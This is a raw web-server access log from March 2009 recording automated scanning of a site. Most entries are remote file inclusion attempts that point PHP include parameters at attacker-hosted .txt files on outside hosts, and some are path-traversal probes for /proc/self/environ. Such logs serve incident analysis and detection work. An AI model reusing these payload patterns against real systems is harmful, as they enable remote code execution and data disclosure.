211.236.242.164 - - [07/Mar/2009:11:12:54 -0600] "GET /logs/access_log.1232496000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.236.242.164 - - [07/Mar/2009:11:12:54 -0600] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.225.253.109 - - [07/Mar/2009:11:13:42 -0600] "GET /logs/access_log.1231545600/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:11:13:43 -0600] "GET /logs/access_log.1233187200/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
211.236.242.164 - - [07/Mar/2009:11:14:03 -0600] "GET /logs/access_log.1230249600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://imagehut.ws/images/baner.jpg?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.225.253.109 - - [07/Mar/2009:11:14:25 -0600] "GET /logs/access_log.1233705600/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
69.13.208.123 - - [07/Mar/2009:11:27:39 -0600] "GET /logs/errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
69.13.208.123 - - [07/Mar/2009:11:27:39 -0600] "GET /errors.php?error=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
74.205.120.232 - - [07/Mar/2009:11:28:01 -0600] "GET //convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:28:01 -0600] "GET /logs/access_log.1231977600//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:28:01 -0600] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
81.182.252.176 - - [07/Mar/2009:11:28:10 -0600] "GET /logs/scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://univers-du-pin.be/ilikeitloud?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.182.252.176 - - [07/Mar/2009:11:28:10 -0600] "GET /scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://univers-du-pin.be/ilikeitloud?? HTTP/1.1" 404 324 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.182.252.176 - - [07/Mar/2009:11:28:10 -0600] "GET /logs/errors.php?error=http://univers-du-pin.be/ilikeitloud?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
81.182.252.176 - - [07/Mar/2009:11:28:10 -0600] "GET /errors.php?error=http://univers-du-pin.be/ilikeitloud?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
81.182.252.176 - - [07/Mar/2009:11:28:11 -0600] "GET /logs/scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 329 "-""XXXXXX"
81.182.252.176 - - [07/Mar/2009:11:28:11 -0600] "GET /scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 324 "-""XXXXXX"
81.182.252.176 - - [07/Mar/2009:11:28:11 -0600] "GET /logs/scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 329 "-""XXXXXX"
81.182.252.176 - - [07/Mar/2009:11:28:11 -0600] "GET /scan%20modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""XXXXXX"
74.205.120.232 - - [07/Mar/2009:11:28:38 -0600] "GET /logs/access_log.1228435200//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
77.221.130.26 - - [07/Mar/2009:11:28:49 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:11:28:49 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:11:28:49 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:11:28:49 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:11:29:01 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:11:29:01 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
67.99.100.113 - - [07/Mar/2009:11:30:09 -0600] "GET //Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
67.99.100.113 - - [07/Mar/2009:11:30:22 -0600] "GET /logs//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.99.100.113 - - [07/Mar/2009:11:30:27 -0600] "GET /logs/access_log.1233187200//Neos_Chronos/header.php?base_folder=http://vncgroup.com.br/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
84.18.157.129 - - [07/Mar/2009:11:31:17 -0600] "GET /send_reminders.php?includedir=http://66.7.56.125/id1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
84.18.157.129 - - [07/Mar/2009:11:31:17 -0600] "GET /logs/send_reminders.php?includedir=http://66.7.56.125/id1.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.34.193.229 - - [07/Mar/2009:11:33:35 -0600] "GET /logs/send_reminders.php?includedir=http://66.7.56.125/id1.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
64.34.193.229 - - [07/Mar/2009:11:33:35 -0600] "GET /send_reminders.php?includedir=http://66.7.56.125/id1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
148.245.102.115 - - [07/Mar/2009:11:37:15 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://c.frey.free.fr/r/module/INI/id.txt??%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
148.245.102.115 - - [07/Mar/2009:11:37:15 -0600] "GET //modules/xfsection/modify.php?dir_module=http://c.frey.free.fr/r/module/INI/id.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
65.73.123.15 - - [07/Mar/2009:11:38:28 -0600] "GET /logs/send_reminders.php?includedir=http://66.7.56.125/id1.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
65.73.123.15 - - [07/Mar/2009:11:38:28 -0600] "GET /send_reminders.php?includedir=http://66.7.56.125/id1.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.130.15 - - [07/Mar/2009:11:46:00 -0600] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:11:46:00 -0600] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:11:46:01 -0600] "GET /logs/access_log.1231027200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:11:46:03 -0600] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:11:46:03 -0600] "GET /logs/access_log.1231027200/vwar/convert/mvcw.php?step=1&vwar_root=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.221.130.15 - - [07/Mar/2009:11:46:03 -0600] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.lazar.ru/manager/processors/min.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:11:47:21 -0600] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:11:47:21 -0600] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:11:47:21 -0600] "GET /logs/access_log.1233187200/modules/Neos_Chronos/header.php?base_folder=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
148.245.102.115 - - [07/Mar/2009:11:47:23 -0600] "GET //modules/xfsection/modify.php?dir_module=http://c.frey.free.fr/r/editor/id1.txt?%0D? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
148.245.102.115 - - [07/Mar/2009:11:47:23 -0600] "GET /logs/access_log.1234656000//modules/xfsection/modify.php?dir_module=http://c.frey.free.fr/r/editor/id1.txt?%0D? HTTP/1.1" 404 339 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
148.245.102.115 - - [07/Mar/2009:11:47:23 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://c.frey.free.fr/r/editor/id1.txt?%0D? HTTP/1.1" 404 317 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
125.141.138.23 - - [07/Mar/2009:11:47:24 -0600] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:11:47:24 -0600] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
125.141.138.23 - - [07/Mar/2009:11:47:24 -0600] "GET /logs/access_log.1233187200/modules/Neos_Chronos/header.php?base_folder=http://www.ppclub.co.kr/bbs/1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
66.225.253.109 - - [07/Mar/2009:11:48:19 -0600] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:11:48:19 -0600] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
148.245.102.115 - - [07/Mar/2009:11:49:24 -0600] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
148.245.102.115 - - [07/Mar/2009:11:49:24 -0600] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://c.frey.free.fr/r/editor/idv6.txt????? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
147.27.14.31 - - [07/Mar/2009:11:50:07 -0600] "GET /logs/errors.php?error=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 298 "-""libwww-perl/5.808"
147.27.14.31 - - [07/Mar/2009:11:50:08 -0600] "GET /errors.php?error=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 293 "-""libwww-perl/5.808"
85.152.38.1 - - [07/Mar/2009:11:50:50 -0600] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.polyphonie-musique.fr//assets/ade.txt??%0D?? HTTP/1.1" 404 338 "-""libwww-perl/5.823"
85.152.38.1 - - [07/Mar/2009:11:50:50 -0600] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.polyphonie-musique.fr//assets/ade.txt??%0D?? HTTP/1.1" 404 333 "-""libwww-perl/5.823"
66.225.253.109 - - [07/Mar/2009:11:50:55 -0600] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
66.225.253.109 - - [07/Mar/2009:11:50:55 -0600] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
74.205.120.232 - - [07/Mar/2009:11:52:27 -0600] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.familychoicerealtyinc.com/uploads/safe1.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
74.205.120.232 - - [07/Mar/2009:11:52:28 -0600] "GET //convert/mvcw.php?step=1&vwar_root=http://www.familychoicerealtyinc.com/uploads/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
74.205.120.232 - - [07/Mar/2009:11:54:43 -0600] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:54:43 -0600] "GET //convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:54:43 -0600] "GET /logs/access_log.1231977600//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:55:17 -0600] "GET /logs/access_log.1228435200//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:11:57:03 -0600] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:11:57:03 -0600] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.205.120.232 - - [07/Mar/2009:11:57:29 -0600] "GET //convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:57:29 -0600] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:57:30 -0600] "GET /logs/access_log.1231977600//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
87.230.58.39 - - [07/Mar/2009:11:57:37 -0600] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.230.58.39 - - [07/Mar/2009:11:57:37 -0600] "GET /logs/access_log.1232755200//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
87.230.58.39 - - [07/Mar/2009:11:57:37 -0600] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.230.58.39 - - [07/Mar/2009:11:57:37 -0600] "GET /logs/access_log.1232496000//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
74.205.120.232 - - [07/Mar/2009:11:58:04 -0600] "GET /logs/access_log.1228435200//convert/mvcw.php?step=1&vwar_root=http://diazzogroup.com/components/com_registration/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:11:58:57 -0600] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:11:58:59 -0600] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
78.151.161.24 - - [07/Mar/2009:11:59:44 -0600] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://www.geocities.com/lunawila/idpit.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
78.151.161.24 - - [07/Mar/2009:11:59:44 -0600] "GET //include/bbs.lib.inc.php?site_path=http://www.geocities.com/lunawila/idpit.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
78.151.161.24 - - [07/Mar/2009:11:59:44 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.geocities.com/lunawila/idpit.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.230.58.39 - - [07/Mar/2009:12:00:38 -0600] "GET /logs/access_log.1232841600//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
78.151.161.24 - - [07/Mar/2009:12:00:58 -0600] "GET /logs/access_log.1233878400//include/bbs.lib.inc.php?site_path=http://www.geocities.com/lunawila/idpit.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
67.19.130.218 - - [07/Mar/2009:12:08:31 -0600] "GET /logs/?_zb_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 200 180667 "-""libwww-perl/5.810"
67.19.130.218 - - [07/Mar/2009:12:08:31 -0600] "GET /?_zb_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
91.93.97.106 - - [07/Mar/2009:12:11:00 -0600] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:12:11:00 -0600] "GET /logs/access_log.1232323200//snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:12:11:00 -0600] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
91.93.97.106 - - [07/Mar/2009:12:11:22 -0600] "GET /logs/access_log.1232064000//snippets/reflect/snippet.reflect.php?reflect_base=http://www.dr52.co.kr//data/db/idfx1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
80.25.82.126 - - [07/Mar/2009:12:17:37 -0600] "GET /logs/?_zb_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 200 180667 "-""libwww-perl/5.76"
80.25.82.126 - - [07/Mar/2009:12:17:37 -0600] "GET /?_zb_path=http://www.amra.eu/kajak_backoffice/cutenews/TT?? HTTP/1.1" 200 3245 "-""libwww-perl/5.76"
78.151.161.24 - - [07/Mar/2009:12:22:27 -0600] "GET /errors.php?error=http://h1.ripway.com/luna22/test.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
77.221.130.26 - - [07/Mar/2009:12:23:09 -0600] "GET /logs/include/write.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:12:23:09 -0600] "GET /include/write.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:12:23:12 -0600] "GET /logs/include/write.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:12:23:12 -0600] "GET /include/write.php?dir=http://51ucn.com/xjarea/shz/help01.txt????? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
151.33.133.2 - - [07/Mar/2009:12:23:26 -0600] "GET /logs///vwar/backup/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
151.33.133.2 - - [07/Mar/2009:12:23:28 -0600] "GET ///vwar/backup/errors.php?error=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
77.221.130.26 - - [07/Mar/2009:12:24:12 -0600] "GET /logs/include/write.php?dir=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.26 - - [07/Mar/2009:12:24:13 -0600] "GET /include/write.php?dir=http://jiahn.com/ktools_v1/ktools/board/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
194.65.81.26 - - [07/Mar/2009:12:24:37 -0600] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
194.65.81.26 - - [07/Mar/2009:12:24:38 -0600] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
85.186.255.184 - - [07/Mar/2009:12:24:46 -0600] "GET /logs/access_log.1234569600/?_zb_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:12:24:46 -0600] "GET /logs/access_log.1232150400/?_zb_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:12:24:46 -0600] "GET /?_zb_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:12:24:48 -0600] "GET /logs/?_zb_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 200 180667 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:12:26:08 -0600] "GET /logs/access_log.1231891200/?_zb_path=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 310 "-""Mozilla/5.0"
62.140.23.183 - - [07/Mar/2009:12:32:06 -0600] "GET /logs//snippets/reflect/snippet.reflect.php?reflect_base=http://vis1.freehostia.com/v6-i.txt???? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
62.140.23.183 - - [07/Mar/2009:12:32:06 -0600] "GET //snippets/reflect/snippet.reflect.php?reflect_base=http://vis1.freehostia.com/v6-i.txt???? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
62.44.70.253 - - [07/Mar/2009:12:33:45 -0600] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:12:33:45 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:12:33:45 -0600] "GET /logs/access_log.1228262400///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:12:33:57 -0600] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:12:33:57 -0600] "GET /logs/access_log.1228262400///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:12:33:58 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
65.98.3.250 - - [07/Mar/2009:12:34:05 -0600] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 317 "-""libwww-perl/5.810"
65.98.3.250 - - [07/Mar/2009:12:34:05 -0600] "GET //modules/vwar/admin/admin.php?vwar_root=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
62.140.23.183 - - [07/Mar/2009:12:43:31 -0600] "GET /logs//includes/get_header.php?vwar_root=http://vis1.freehostia.com/v6-i.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
62.140.23.183 - - [07/Mar/2009:12:43:31 -0600] "GET //includes/get_header.php?vwar_root=http://vis1.freehostia.com/v6-i.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
70.38.71.140 - - [07/Mar/2009:12:56:54 -0600] "GET /logs//bbshop/shop/main.php?_shop_path=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
70.38.71.140 - - [07/Mar/2009:12:56:54 -0600] "GET //bbshop/shop/main.php?_shop_path=http://cg-cars.com/.../safe1.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
217.22.60.25 - - [07/Mar/2009:13:01:19 -0600] "GET //include/write.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.812"
217.22.60.25 - - [07/Mar/2009:13:01:19 -0600] "GET /logs//include/write.php?dir=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.812"
217.22.60.25 - - [07/Mar/2009:13:04:14 -0600] "GET //index.php?_REQUEST=&_REQUEST[option]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
217.22.60.25 - - [07/Mar/2009:13:04:15 -0600] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
83.96.139.151 - - [07/Mar/2009:13:08:05 -0600] "GET //includes/get_header.php?vwar_root=http://vis1.freehostia.com/nat.jpg??? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
217.22.60.25 - - [07/Mar/2009:13:08:10 -0600] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.lazar.ru/manager/processors/copyright.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
